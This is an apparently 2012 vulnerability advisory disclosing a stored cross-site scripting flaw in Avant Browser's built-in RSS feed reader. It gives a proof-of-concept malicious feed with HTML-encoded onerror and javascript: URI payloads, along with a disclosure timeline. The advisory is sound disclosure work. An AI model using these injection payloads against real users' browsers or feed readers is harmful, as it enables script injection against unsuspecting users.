Wednesday, 5 December 2012

Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)


Details

Vendor Site: Avant browser (www.avantbrowser.com)
Date: December, 5 2012 – CVE (TBA)
Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions
Status: Unpatched
Researcher: Roberto Suggi Liverani - @malerisch
PDF version: Avant_multiple_vulnerabilities_advisory.pdf


Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)

A malicious user can inject and store arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following:
  • <title> element: JavaScript injection using HTML encoded payload
  • <link> element: JavaScript injection using javascript: pseudouri ( this is rendered in about:blank zone.)
  • <description> element: JavaScript injection using HTML encoded payload
The following table shows an example of malicious RSS feed:

<?xml version='1.0' encoding="ISO-8859-1"?>
<rss version='2.0'>
<channel>
<description>Malerisch.net</description>
<link>http://blog.malerisch.net/</link>
<title>Malerisch.net</title>
<item>
    <title>browser security&gt;&lt;img src=a onerror='alert(1);' ;&gt;</title>
    <link>javascript:alert(window.location);</link>
    <description>07/09/2008 - I have done some research in the area of browser security and presented this argument at the last OWASP NZ meeting.&lt;img src=a onerror='alert(2);';&gt;
    </description>
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
</item>
</channel>
</rss>

Injection is possible in a single case: user views a malicious feed using Avant Feed Reader built-in component.

The Feed Reader is located at feed:// URI scheme (e.g. feed://localhost/browser/avent/rss.xml) Note that the URL of the feed has to be subscribed to be rendered under the feed: uri. Also, the feed:// uri scheme is mapped to browser://localhost/lst?domain.name/path/to/rss.feed.


Exploitation

This vulnerability can be defined as a traditional Stored Cross Site Scripting vulnerability. Although, the injection is rendered within an internal browser zone (mapped to browser://localhost/lst?domain.name/path/to/rss.feed  ), invocation of privileged commands appears to not be possible as SOP is correctly applied to the browser:// zone.

Video

Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)


Timeline

07/03/2012 - Posted 10 posts to a forum to get a security contact
14/03/2012 - Reception of report confirmed but no further reply
14/03/2012 - Chased them, no reply
03-05/2012 - 2 new releases following the report, one bug silently fixed
12/05/2012 - HITB2012AMS - bug disclosed during presentation
14/11/2012 - HackPra - bug and exploit module presented

Solution

Do not use Avant browser.